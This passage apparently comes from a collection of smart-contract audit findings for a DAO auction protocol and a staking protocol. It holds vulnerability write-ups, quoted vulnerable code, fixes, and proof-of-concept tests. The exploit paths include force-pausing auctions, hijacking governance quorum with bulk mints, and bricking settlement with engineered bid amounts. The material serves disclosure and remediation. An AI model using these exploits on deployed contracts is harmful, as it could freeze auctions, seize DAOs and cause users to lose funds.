}\\n}\\n```\\n\\nPOC:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.16;\\n\\nimport { NounsBuilderTest } from "./utils/NounsBuilderTest.sol";\\nimport { MockERC721 } from "./utils/mocks/MockERC721.sol";\\nimport { MockImpl } from "./utils/mocks/MockImpl.sol";\\nimport { MockPartialTokenImpl } from "./utils/mocks/MockPartialTokenImpl.sol";\\nimport { MockProtocolRewards } from "./utils/mocks/MockProtocolRewards.sol";\\nimport { Auction } from "../src/auction/Auction.sol";\\nimport { IAuction } from "../src/auction/IAuction.sol";\\nimport { AuctionTypesV2 } from "../src/auction/types/AuctionTypesV2.sol";\\nimport { TokenTypesV2 } from "../src/token/types/TokenTypesV2.sol";\\nimport { Attacker } from "./Attacker.sol";\\n\\ncontract AuctionTest is NounsBuilderTest {\\n MockImpl internal mockImpl;\\n Auction internal rewardImpl;\\n Attacker internal attacker;\\n address internal bidder1;\\n address internal bidder2;\\n address internal referral;\\n uint16 internal builderRewardBPS = 300;\\n uint16 internal referralRewardBPS = 400;\\n\\n function setUp() public virtual override {\\n super.setUp();\\n bidder1 = vm.addr(0xB1);\\n bidder2 = vm.addr(0xB2);\\n vm.deal(bidder1, 100 ether);\\n vm.deal(bidder2, 100 ether);\\n mockImpl = new MockImpl();\\n rewardImpl = new Auction(address(manager), address(rewards), weth, builderRewardBPS, referralRewardBPS);\\n attacker = new Attacker();\\n }\\n\\n function test_POC() public {\\n // START OF SETUP\\n address[] memory wallets = new address[](1);\\n uint256[] memory percents = new uint256[](1);\\n uint256[] memory vestingEnds = new uint256[](1);\\n wallets[0] = founder;\\n percents[0] = 99;\\n vestingEnds[0] = 4 weeks;\\n //Setting founder with high percentage ownership.\\n setFounderParams(wallets, percents, vestingEnds);\\n setMockTokenParams();\\n setMockAuctionParams();\\n setMockGovParams();\\n deploy(foundersArr, tokenParams, auctionParams, govParams);\\n setMockMetadata();\\n // END OF SETUP\\n\\n // Start auction contract and do the first auction\\n vm.prank(founder);\\n auction.unpause();\\n vm.prank(bidder1);\\n auction.createBid{ value: 0.420 ether }(99);\\n vm.prank(bidder2);\\n auction.createBid{ value: 1 ether }(99);\\n\\n // Move block.timestamp so auction can end.\\n vm.warp(10 minutes + 1 seconds);\\n\\n //Attacker calls the auction\\n attacker.forcePause(address(auction));\\n\\n //Check that auction was paused.\\n assertEq(auction.paused(), true);\\n }\\n}\\n```\\n
Consider better handling the possible errors from `Token.mint()`, like shown below:\\n```\\n function _createAuction() private returns (bool) {\\n // Get the next token available for bidding\\n try token.mint() returns (uint256 tokenId) {\\n //CODE OMMITED\\n } catch (bytes memory err) {\\n // On production consider pre-calculating the hash values to save gas\\n if (keccak256(abi.encodeWithSignature("NO_METADATA_GENERATED()")) == keccak256(err)) {\\n _pause();\\n return false\\n } else if (keccak256(abi.encodeWithSignature("ALREADY_MINTED()") == keccak256(err)) {\\n _pause();\\n return false\\n } else {\\n revert OUT_OF_GAS();\\n }\\n } \\n```\\n
Should the conditions mentioned above be met, an attacker can arbitrarily pause the auction contract, effectively interrupting the DAO auction process. This pause persists until owners takes subsequent actions to unpause the contract. The attacker can exploit this vulnerability repeatedly.
```\\nfunction _createAuction() private returns (bool) {\\n // Get the next token available for bidding\\n try token.mint() returns (uint256 tokenId) {\\n // Store the token id\\n auction.tokenId = tokenId;\\n\\n // Cache the current timestamp\\n uint256 startTime = block.timestamp;\\n\\n // Used to store the auction end time\\n uint256 endTime;\\n\\n // Cannot realistically overflow\\n unchecked {\\n // Compute the auction end time\\n endTime = startTime + settings.duration;\\n }\\n\\n // Store the auction start and end time\\n auction.startTime = uint40(startTime);\\n auction.endTime = uint40(endTime);\\n\\n // Reset data from the previous auction\\n auction.highestBid = 0;\\n auction.highestBidder = address(0);\\n auction.settled = false;\\n\\n // Reset referral from the previous auction\\n currentBidReferral = address(0);\\n\\n emit AuctionCreated(tokenId, startTime, endTime);\\n return true;\\n } catch {\\n // Pause the contract if token minting failed\\n _pause();\\n return false;\\n }\\n}\\n```\\n
MerkleReserveMinter minting methodology is incompatible with current governance structure and can lead to migrated DAOs being hijacked immediately
medium
MerkleReserveMinter allows large number of tokens to be minted instantaneously which is incompatible with the current governance structure which relies on tokens being minted individually and time locked after minting by the auction. By minting and creating a proposal in the same block a user is able to create a proposal with significantly lower quorum than expected. This could easily be used to hijack the migrated DAO.\\nMerkleReserveMinter.sol#L154-L167\\n```\\nunchecked {\\n for (uint256 i = 0; i < claimCount; ++i) {\\n // Load claim in memory\\n MerkleClaim memory claim = claims[I];\\n\\n // Requires one proof per tokenId to handle cases where users want to partially claim\\n if (!MerkleProof.verify(claim.merkleProof, settings.merkleRoot, keccak256(abi.encode(claim.mintTo, claim.tokenId)))) {\\n revert INVALID_MERKLE_PROOF(claim.mintTo, claim.merkleProof, settings.merkleRoot);\\n }\\n\\n // Only allowing reserved tokens to be minted for this strategy\\n IToken(tokenContract).mintFromReserveTo(claim.mintTo, claim.tokenId);\\n }\\n}\\n```\\n\\nWhen minting from the claim merkle tree, a user is able to mint as many tokens as they want in a single transaction. This means in a single transaction, the supply of the token can increase very dramatically. Now we'll take a look at the governor contract as to why this is such an issue.\\nGovernor.sol#L184-L192\\n```\\n // Store the proposal data\\n proposal.voteStart = SafeCast.toUint32(snapshot);\\n proposal.voteEnd = SafeCast.toUint32(deadline);\\n proposal.proposalThreshold = SafeCast.toUint32(currentProposalThreshold);\\n proposal.quorumVotes = SafeCast.toUint32(quorum());\\n proposal.proposer = msg.sender;\\n proposal.timeCreated = SafeCast.toUint32(block.timestamp);\\n\\n emit ProposalCreated(proposalId, _targets, _values, _calldatas, _description, descriptionHash, proposal);\\n```\\n\\nGovernor.sol#L495-L499\\n```\\nfunction quorum() public view returns (uint256) {\\n unchecked {\\n return (settings.token.totalSupply() * settings.quorumThresholdBps) / BPS_PER_100_PERCENT;\\n }\\n}\\n```\\n\\nWhen creating a proposal, we see that it uses a snapshot of the CURRENT total supply. This is what leads to the issue. The setup is fairly straightforward and occurs all in a single transaction:\\nCreate a malicious proposal (which snapshots current supply)\\nMint all the tokens\\nVote on malicious proposal with all minted tokens\\nThe reason this works is because the quorum is based on the supply before the mint while votes are considered after the mint, allowing significant manipulation of the quorum.
Token should be changed to use a checkpoint based total supply, similar to how balances are handled. Quorum should be based on that instead of the current supply.
DOA can be completely hijacked
```\\nunchecked {\\n for (uint256 i = 0; i < claimCount; ++i) {\\n // Load claim in memory\\n MerkleClaim memory claim = claims[I];\\n\\n // Requires one proof per tokenId to handle cases where users want to partially claim\\n if (!MerkleProof.verify(claim.merkleProof, settings.merkleRoot, keccak256(abi.encode(claim.mintTo, claim.tokenId)))) {\\n revert INVALID_MERKLE_PROOF(claim.mintTo, claim.merkleProof, settings.merkleRoot);\\n }\\n\\n // Only allowing reserved tokens to be minted for this strategy\\n IToken(tokenContract).mintFromReserveTo(claim.mintTo, claim.tokenId);\\n }\\n}\\n```\\n
when reservedUntilTokenId > 100 first funder loss 1% NFT
high
The incorrect use of `baseTokenId = reservedUntilTokenId` may result in the first `tokenRecipient[]` being invalid, thus preventing the founder from obtaining this portion of the NFT.\\nThe current protocol adds a parameter `reservedUntilTokenId` for reserving `Token`. This parameter will be used as the starting `baseTokenId` during initialization.\\n```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n uint256 baseTokenId = reservedUntilTokenId;\\n\\n // For each token to vest:\\n for (uint256 j; j < founderPct; ++j) {\\n // Get the available token id\\n baseTokenId = _getNextTokenId(baseTokenId);\\n\\n // Store the founder as the recipient\\n tokenRecipient[baseTokenId] = newFounder;\\n\\n emit MintScheduled(baseTokenId, founderId, newFounder);\\n\\n // Update the base token id\\n baseTokenId = (baseTokenId + schedule) % 100;\\n }\\n }\\n..\\n\\n function _getNextTokenId(uint256 _tokenId) internal view returns (uint256) {\\n unchecked {\\n while (tokenRecipient[_tokenId].wallet != address(0)) {\\n _tokenId = (++_tokenId) % 100;\\n }\\n\\n return _tokenId;\\n }\\n }\\n```\\n\\nBecause `baseTokenId = reservedUntilTokenId` is used, if `reservedUntilTokenId>100`, for example, reservedUntilTokenId=200, the first `_getNextTokenId(200)` will return `baseTokenId=200 , tokenRecipient[200]=newFounder`.\\nExample: reservedUntilTokenId = 200 founder[0].founderPct = 10\\nIn this way, the `tokenRecipient[]` of `founder` will become tokenRecipient[200].wallet = `founder` ( first will call _getNextTokenId(200) return 200) tokenRecipient[10].wallet = `founder` ( second will call _getNextTokenId((200 + 10) %100 = 10) ) tokenRecipient[20].wallet = `founder` ... tokenRecipient[90].wallet = `founder`\\nHowever, this `tokenRecipient[200]` will never be used, because in `_isForFounder()`, it will be modulo, so only `baseTokenId < 100` is valid. In this way, the first founder can actually only `9%` of NFT.\\n```\\n function _isForFounder(uint256 _tokenId) private returns (bool) {\\n // Get the base token id\\n uint256 baseTokenId = _tokenId % 100;\\n\\n // If there is no scheduled recipient:\\n if (tokenRecipient[baseTokenId].wallet == address(0)) {\\n return false;\\n\\n // Else if the founder is still vesting:\\n } else if (block.timestamp < tokenRecipient[baseTokenId].vestExpiry) {\\n // Mint the token to the founder\\n _mint(tokenRecipient[baseTokenId].wallet, _tokenId);\\n\\n return true;\\n\\n // Else the founder has finished vesting:\\n } else {\\n // Remove them from future lookups\\n delete tokenRecipient[baseTokenId];\\n\\n return false;\\n }\\n }\\n```\\n\\nPOC\\nThe following test demonstrates that `tokenRecipient[200]` is for founder.\\nneed change tokenRecipient to public , so can assertEq\\n```\\ncontract TokenStorageV1 is TokenTypesV1 {\\n /// @notice The token settings\\n Settings internal settings;\\n\\n /// @notice The vesting details of a founder\\n /// @dev Founder id => Founder\\n mapping(uint256 => Founder) internal founder;\\n\\n /// @notice The recipient of a token\\n /// @dev ERC// Remove the line below\\n721 token id => Founder\\n// Remove the line below\\n mapping(uint256 => Founder) internal tokenRecipient;\\n// Add the line below\\n mapping(uint256 => Founder) public tokenRecipient;\\n}\\n```\\n\\nadd to `token.t.sol`\\n```\\n function test_lossFirst(address _minter, uint256 _reservedUntilTokenId, uint256 _tokenId) public {\\n deployAltMock(200);\\n (address wallet ,,)= token.tokenRecipient(200);\\n assertEq(wallet,founder);\\n }\\n```\\n\\n```\\n$ forge test -vvv --match-test test_lossFirst\\n\\nRunning 1 test for test/Token.t.sol:TokenTest\\n[PASS] test_lossFirst(address,uint256,uint256) (runs: 256, μ: 3221578, ~: 3221578)\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 355.45ms\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)\\n```\\n
A better is that the baseTokenId always starts from 0.\\n```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n// Remove the line below\\n uint256 baseTokenId = reservedUntilTokenId;\\n// Add the line below\\n uint256 baseTokenId =0;\\n```\\n\\nor\\nuse `uint256 baseTokenId = reservedUntilTokenId % 100;`\\n```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n// Remove the line below\\n uint256 baseTokenId = reservedUntilTokenId;\\n// Add the line below\\n uint256 baseTokenId = reservedUntilTokenId % 100;\\n```\\n
when reservedUntilTokenId > 100 first funder loss 1% NFT
```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n uint256 baseTokenId = reservedUntilTokenId;\\n\\n // For each token to vest:\\n for (uint256 j; j < founderPct; ++j) {\\n // Get the available token id\\n baseTokenId = _getNextTokenId(baseTokenId);\\n\\n // Store the founder as the recipient\\n tokenRecipient[baseTokenId] = newFounder;\\n\\n emit MintScheduled(baseTokenId, founderId, newFounder);\\n\\n // Update the base token id\\n baseTokenId = (baseTokenId + schedule) % 100;\\n }\\n }\\n..\\n\\n function _getNextTokenId(uint256 _tokenId) internal view returns (uint256) {\\n unchecked {\\n while (tokenRecipient[_tokenId].wallet != address(0)) {\\n _tokenId = (++_tokenId) % 100;\\n }\\n\\n return _tokenId;\\n }\\n }\\n```\\n
Adversary can permanently brick auctions due to precision error in Auction#_computeTotalRewards
high
When batch depositing to ProtocolRewards, the msg.value is expected to match the sum of the amounts array EXACTLY. The issue is that due to precision loss in Auction#_computeTotalRewards this call can be engineered to always revert which completely bricks the auction process.\\nProtocolRewards.sol#L55-L65\\n```\\n for (uint256 i; i < numRecipients; ) {\\n expectedTotalValue += amounts[i];\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n if (msg.value != expectedTotalValue) {\\n revert INVALID_DEPOSIT();\\n }\\n```\\n\\nWhen making a batch deposit the above method is called. As seen, the call with revert if the sum of amounts does not EXACTLY equal the msg.value.\\nAuction.sol#L474-L507\\n```\\n uint256 totalBPS = _founderRewardBps + referralRewardsBPS + builderRewardsBPS;\\n\\n // rest of code\\n\\n // Calulate total rewards\\n split.totalRewards = (_finalBidAmount * totalBPS) / BPS_PER_100_PERCENT;\\n\\n // rest of code\\n\\n // Initialize arrays\\n split.recipients = new address[](arraySize);\\n split.amounts = new uint256[](arraySize);\\n split.reasons = new bytes4[](arraySize);\\n\\n // Set builder reward\\n split.recipients[0] = builderRecipient;\\n split.amounts[0] = (_finalBidAmount * builderRewardsBPS) / BPS_PER_100_PERCENT;\\n\\n // Set referral reward\\n split.recipients[1] = _currentBidRefferal != address(0) ? _currentBidRefferal : builderRecipient;\\n split.amounts[1] = (_finalBidAmount * referralRewardsBPS) / BPS_PER_100_PERCENT;\\n\\n // Set founder reward if enabled\\n if (hasFounderReward) {\\n split.recipients[2] = founderReward.recipient;\\n split.amounts[2] = (_finalBidAmount * _founderRewardBps) / BPS_PER_100_PERCENT;\\n }\\n```\\n\\nThe sum of the percentages are used to determine the totalRewards. Meanwhile, the amounts are determined using the broken out percentages of each. This leads to unequal precision loss, which can cause totalRewards to be off by a single wei which cause the batch deposit to revert and the auction to be bricked. Take the following example:\\nAssume a referral reward of 5% (500) and a builder reward of 5% (500) for a total of 10% (1000). To brick the contract the adversary can engineer their bid with specific final digits. In this example, take a bid ending in 19.\\n```\\nsplit.totalRewards = (19 * 1,000) / 100,000 = 190,000 / 100,000 = 1\\n\\nsplit.amounts[0] = (19 * 500) / 100,000 = 95,000 / 100,000 = 0\\nsplit.amounts[1] = (19 * 500) / 100,000 = 95,000 / 100,000 = 0\\n```\\n\\nHere we can see that the sum of amounts is not equal to totalRewards and the batch deposit will revert.\\nAuction.sol#L270-L273\\n```\\nif (split.totalRewards != 0) {\\n // Deposit rewards\\n rewardsManager.depositBatch{ value: split.totalRewards }(split.recipients, split.amounts, split.reasons, "");\\n}\\n```\\n\\nThe depositBatch call is placed in the very important _settleAuction function. This results in auctions that are permanently broken and can never be settled.
Instead of setting totalRewards with the sum of the percentages, increment it by each fee calculated. This way they will always match no matter what.
Auctions are completely bricked
```\\n for (uint256 i; i < numRecipients; ) {\\n expectedTotalValue += amounts[i];\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n if (msg.value != expectedTotalValue) {\\n revert INVALID_DEPOSIT();\\n }\\n```\\n
Lowering the gauge weight can disrupt accounting, potentially leading to both excessive fund distribution and a loss of funds.
high
Similar issues were found by users 0xDetermination and bart1e in the Canto veRWA audit, which uses a similar gauge controller type.\\nWhen the _change_gauge_weight function is called, the `points_weight[addr][next_time].bias` andtime_weight[addr] are updated - the slope is not.\\n```\\ndef _change_gauge_weight(addr: address, weight: uint256):\\n # Change gauge weight\\n # Only needed when testing in reality\\n gauge_type: int128 = self.gauge_types_[addr] - 1\\n old_gauge_weight: uint256 = self._get_weight(addr)\\n type_weight: uint256 = self._get_type_weight(gauge_type)\\n old_sum: uint256 = self._get_sum(gauge_type)\\n _total_weight: uint256 = self._get_total()\\n next_time: uint256 = (block.timestamp + WEEK) / WEEK * WEEK\\n\\n self.points_weight[addr][next_time].bias = weight\\n self.time_weight[addr] = next_time\\n\\n new_sum: uint256 = old_sum + weight - old_gauge_weight\\n self.points_sum[gauge_type][next_time].bias = new_sum\\n self.time_sum[gauge_type] = next_time\\n\\n _total_weight = _total_weight + new_sum * type_weight - old_sum * type_weight\\n self.points_total[next_time] = _total_weight\\n self.time_total = next_time\\n\\n log NewGaugeWeight(addr, block.timestamp, weight, _total_weight)\\n```\\n\\nThe equation f(t) = c - mx represents the gauge's decay equation before the weight is reduced. In this equation, `m` is the slope. After the weight is reduced by an amount `k` using the `change_gauge_weight` function, the equation becomes f(t) = c - `k` - mx The slope `m` remains unchanged, but the t-axis intercept changes from t1 = c/m to t2 = (c-k)/m.\\nSlope adjustments that should be applied to the global slope when decay reaches 0 are stored in the `changes_sum` hashmap. And is not affected by changes in gauge weight. Consequently, there's a time window t1 - t2 during which the earlier slope changes applied to the global state when user called `vote_for_gauge_weights` function remains applied even though they should have been subtracted. This in turn creates a situation in which the global weightis less than the sum of the individual gauge weights, resulting in an accounting error.\\nSo, in the `CvgRewards` contract when the `writeStakingRewards` function invokes the `_checkpoint`, which subsequently triggers the `gauge_relative_weight_writes` function for the relevant time period, the calculated relative weight becomes inflated, leading to an increase in the distributed rewards. If all available rewards are distributed before the entire array is processed, the remaining users will receive no rewards."\\nThe issue mainly arises when a gauge's weight has completely diminished to zero. This is certain to happen if a gauge with a non-zero bias, non-zero slope, and a t-intercept exceeding the current time is killed using `kill_gauge` function.\\nAdditionally, decreasing a gauge's weight introduces inaccuracies in its decay equation, as is evident in the t-intercept.
Disable weight reduction, or only allow reset to 0.
The way rewards are calculated is broken, leading to an uneven distribution of rewards, with some users receiving too much and others receiving nothing.
```\\ndef _change_gauge_weight(addr: address, weight: uint256):\\n # Change gauge weight\\n # Only needed when testing in reality\\n gauge_type: int128 = self.gauge_types_[addr] - 1\\n old_gauge_weight: uint256 = self._get_weight(addr)\\n type_weight: uint256 = self._get_type_weight(gauge_type)\\n old_sum: uint256 = self._get_sum(gauge_type)\\n _total_weight: uint256 = self._get_total()\\n next_time: uint256 = (block.timestamp + WEEK) / WEEK * WEEK\\n\\n self.points_weight[addr][next_time].bias = weight\\n self.time_weight[addr] = next_time\\n\\n new_sum: uint256 = old_sum + weight - old_gauge_weight\\n self.points_sum[gauge_type][next_time].bias = new_sum\\n self.time_sum[gauge_type] = next_time\\n\\n _total_weight = _total_weight + new_sum * type_weight - old_sum * type_weight\\n self.points_total[next_time] = _total_weight\\n self.time_total = next_time\\n\\n log NewGaugeWeight(addr, block.timestamp, weight, _total_weight)\\n```\\n
Tokens that are both bribes and StakeDao gauge rewards will cause loss of funds
high
When SdtStakingPositionService is pulling rewards and bribes from buffer, the buffer will return a list of tokens and amounts owed. This list is used to set the rewards eligible for distribution. Since this list is never check for duplicate tokens, a shared bribe and reward token would cause the token to show up twice in the list. The issue it that _sdtRewardsByCycle is set and not incremented which will cause the second occurrence of the token to overwrite the first and break accounting. The amount of token received from the gauge reward that is overwritten will be lost forever.\\nIn L559 of SdtStakingPositionService it receives a list of tokens and amount from the buffer.\\nSdtBuffer.sol#L90-L168\\n```\\n ICommonStruct.TokenAmount[] memory bribeTokens = _sdtBlackHole.pullSdStakingBribes(\\n processor,\\n _processorRewardsPercentage\\n );\\n\\n uint256 rewardAmount = _gaugeAsset.reward_count();\\n\\n ICommonStruct.TokenAmount[] memory tokenAmounts = new ICommonStruct.TokenAmount[](\\n rewardAmount + bribeTokens.length\\n );\\n\\n uint256 counter;\\n address _processor = processor;\\n for (uint256 j; j < rewardAmount; ) {\\n IERC20 token = _gaugeAsset.reward_tokens(j);\\n uint256 balance = token.balanceOf(address(this));\\n if (balance != 0) {\\n uint256 fullBalance = balance;\\n\\n // rest of code\\n\\n token.transfer(sdtRewardsReceiver, balance);\\n\\n **@audit token and amount added from reward_tokens pulled directly from gauge**\\n\\n tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: balance});\\n }\\n\\n // rest of code\\n\\n }\\n\\n for (uint256 j; j < bribeTokens.length; ) {\\n IERC20 token = bribeTokens[j].token;\\n uint256 amount = bribeTokens[j].amount;\\n\\n **@audit token and amount added directly with no check for duplicate token**\\n\\n if (amount != 0) {\\n tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: amount});\\n\\n // rest of code\\n\\n }\\n```\\n\\nSdtBuffer#pullRewards returns a list of tokens that is a concatenated array of all bribe and reward tokens. There is not controls in place to remove duplicates from this list of tokens. This means that tokens that are both bribes and rewards will be duplicated in the list.\\nSdtStakingPositionService.sol#L561-L577\\n```\\n for (uint256 i; i < _rewardAssets.length; ) {\\n IERC20 _token = _rewardAssets[i].token;\\n uint256 erc20Id = _tokenToId[_token];\\n if (erc20Id == 0) {\\n uint256 _numberOfSdtRewards = ++numberOfSdtRewards;\\n _tokenToId[_token] = _numberOfSdtRewards;\\n erc20Id = _numberOfSdtRewards;\\n }\\n\\n **@audit overwrites and doesn't increment causing duplicates to be lost** \\n\\n _sdtRewardsByCycle[_cvgStakingCycle][erc20Id] = ICommonStruct.TokenAmount({\\n token: _token,\\n amount: _rewardAssets[i].amount\\n });\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nWhen storing this list of rewards, it overwrites _sdtRewardsByCycle with the values from the returned array. This is where the problem arises because duplicates will cause the second entry to overwrite the first entry. Since the first instance is overwritten, all funds in the first occurrence will be lost permanently.
Either sdtBuffer or SdtStakingPositionService should be updated to combine duplicate token entries and prevent overwriting.
Tokens that are both bribes and rewards will be cause tokens to be lost forever
```\\n ICommonStruct.TokenAmount[] memory bribeTokens = _sdtBlackHole.pullSdStakingBribes(\\n processor,\\n _processorRewardsPercentage\\n );\\n\\n uint256 rewardAmount = _gaugeAsset.reward_count();\\n\\n ICommonStruct.TokenAmount[] memory tokenAmounts = new ICommonStruct.TokenAmount[](\\n rewardAmount + bribeTokens.length\\n );\\n\\n uint256 counter;\\n address _processor = processor;\\n for (uint256 j; j < rewardAmount; ) {\\n IERC20 token = _gaugeAsset.reward_tokens(j);\\n uint256 balance = token.balanceOf(address(this));\\n if (balance != 0) {\\n uint256 fullBalance = balance;\\n\\n // rest of code\\n\\n token.transfer(sdtRewardsReceiver, balance);\\n\\n **@audit token and amount added from reward_tokens pulled directly from gauge**\\n\\n tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: balance});\\n }\\n\\n // rest of code\\n\\n }\\n\\n for (uint256 j; j < bribeTokens.length; ) {\\n IERC20 token = bribeTokens[j].token;\\n uint256 amount = bribeTokens[j].amount;\\n\\n **@audit token and amount added directly with no check for duplicate token**\\n\\n if (amount != 0) {\\n tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: amount});\\n\\n // rest of code\\n\\n }\\n```\\n
Delegation Limitation in Voting Power Management
medium
MgCVG Voting power delegation system is constrained by 2 hard limits, first on the number of tokens delegated to one user (maxTokenIdsDelegated = 25) and second on the number of delegatees for one token ( maxMgDelegatees = 5). Once this limit is reached for a token, the token owner cannot modify the delegation percentage to an existing delegated user. This inflexibility can prevent efficient and dynamic management of delegated voting power.\\nObserve these lines :\\n```\\nfunction delegateMgCvg(uint256 _tokenId, address _to, uint96 _percentage) external onlyTokenOwner(_tokenId) {\\n require(_percentage <= 100, "INVALID_PERCENTAGE");\\n\\n uint256 _delegateesLength = delegatedMgCvg[_tokenId].length;\\n require(_delegateesLength < maxMgDelegatees, "TOO_MUCH_DELEGATEES");\\n\\n uint256 tokenIdsDelegated = mgCvgDelegatees[_to].length;\\n require(tokenIdsDelegated < maxTokenIdsDelegated, "TOO_MUCH_MG_TOKEN_ID_DELEGATED");\\n```\\n\\nif either `maxMgDelegatees` or `maxTokenIdsDelegated` are reached, delegation is no longer possible. The problem is the fact that this function can be either used to delegate or to update percentage of delegation or also to remove a delegation but in cases where we already delegated to a maximum of users (maxMgDelegatees) OR the user to who we delegated has reached the maximum number of tokens that can be delegated to him/her (maxTokenIdsDelegated), an update or a removal of delegation is no longer possible.\\n6 scenarios are possible :\\n`maxTokenIdsDelegated` is set to 5, Alice is the third to delegate her voting power to Bob and choose to delegate 10% to him. Bob gets 2 other people delegating their tokens to him, Alice wants to increase the power delegated to Bob to 50% but she cannot due to Bob reaching `maxTokenIdsDelegated`\\n`maxTokenIdsDelegated` is set to 25, Alice is the 10th to delegate her voting power to Bob and choose to delegate 10%, DAO decrease `maxTokenIdsDelegated` to 3, Alice wants to increase the power delegated to Bob to 50%, but she cannot due to this\\n`maxTokenIdsDelegated` is set to 5, Alice is the third to delegate her voting power to Bob and choose to delegate 90%. Bob gets 2 other people delegating their tokens to him, Alice wants to only remove the power delegated to Bob using this function, but she cannot due to this\\n`maxMgDelegatees` is set to 3, Alice delegates her voting power to Bob,Charly and Donald by 20% each, Alice reaches `maxMgDelegatees` and she cannot update her voting power for any of Bob,Charly or Donald\\n`maxMgDelegatees` is set to 5, Alice delegates her voting power to Bob,Charly and Donald by 20% each,DAO decreasesmaxMgDelegatees to 3. Alice cannot update or remove her voting power delegated to any of Bob,Charly and Donald\\n`maxMgDelegatees` is set to 3, Alice delegates her voting power to Bob,Charly and Donald by 20% each, Alice wants to only remove her delegation to Bob but she reached `maxMgDelegatees` so she cannot only remove her delegation to Bob\\nA function is provided to remove all user to who we delegated but this function cannot be used as a solution to this problem due to 2 things :\\nIt's clearly not intended to do an update of voting power percentage by first removing all delegation we did because `delegateMgCvg()` is clearly defined to allow to delegate OR to remove one delegation OR to update percentage of delegation but in some cases it's impossible which is not acceptable\\nif Alice wants to update it's percentage delegated to Bob , she would have to remove all her delegatees and would take the risk that someone is faster than her and delegate to Bob before her, making Bob reaches `maxTokenIdsDelegated` and would render impossible for Alice to re-delegate to Bob\\nPOC\\nYou can add it to test/ut/delegation/balance-delegation.spec.ts :\\n```\\nit("maxTokenIdsDelegated is reached => Cannot update percentage of delegate", async function () {\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(25);\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(3);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(3);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user2).delegateMgCvg(2, user10, 30);\\n await lockingPositionDelegate.connect(user3).delegateMgCvg(3, user10, 30);\\n \\n const txFail = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 40);\\n await expect(txFail).to.be.revertedWith("TOO_MUCH_MG_TOKEN_ID_DELEGATED");\\n });\\n it("maxTokenIdsDelegated IS DECREASED => PERCENTAGE UPDATE IS NO LONGER POSSIBLE", async function () {\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(25);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(25);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user2).delegateMgCvg(2, user10, 30);\\n await lockingPositionDelegate.connect(user3).delegateMgCvg(3, user10, 30);\\n\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(3);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(3); \\n\\n const txFail = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 40);\\n await expect(txFail).to.be.revertedWith("TOO_MUCH_MG_TOKEN_ID_DELEGATED");\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(25);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(25);\\n });\\n it("maxMgDelegatees : TRY TO UPDATE PERCENTAGE DELEGATED TO A USER IF WE ALREADY REACH maxMgDelegatees", async function () {\\n await lockingPositionDelegate.connect(treasuryDao).setMaxMgDelegatees(3);\\n (await lockingPositionDelegate.maxMgDelegatees()).should.be.equal(3);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user2, 30);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user3, 30);\\n\\n const txFail = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 40);\\n await expect(txFail).to.be.revertedWith("TOO_MUCH_DELEGATEES");\\n });\\n it("maxMgDelegatees : maxMgDelegatees IS DECREASED => PERCENTAGE UPDATE IS NO LONGER POSSIBLE", async function () {\\n await lockingPositionDelegate.connect(treasuryDao).setMaxMgDelegatees(5);\\n (await lockingPositionDelegate.maxMgDelegatees()).should.be.equal(5);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user2, 30);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user3, 10);\\n\\n await lockingPositionDelegate.connect(treasuryDao).setMaxMgDelegatees(2);\\n (await lockingPositionDelegate.maxMgDelegatees()).should.be.equal(2);\\n\\n const txFail2 = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user2, 50);\\n await expect(txFail2).to.be.revertedWith("TOO_MUCH_DELEGATEES");\\n });\\n```\\n
Issue Delegation Limitation in Voting Power Management\\nSeparate functions for new delegations and updates : Implement logic that differentiates between adding a new delegatee and updating an existing delegation to allow updates to existing delegations even if the maximum number of delegatees is reached
In some cases it is impossible to update percentage delegated or to remove only one delegated percentage then forcing users to remove all their voting power delegatations, taking the risk that someone is faster then them to delegate to their old delegated users and reach threshold for delegation, making impossible for them to re-delegate
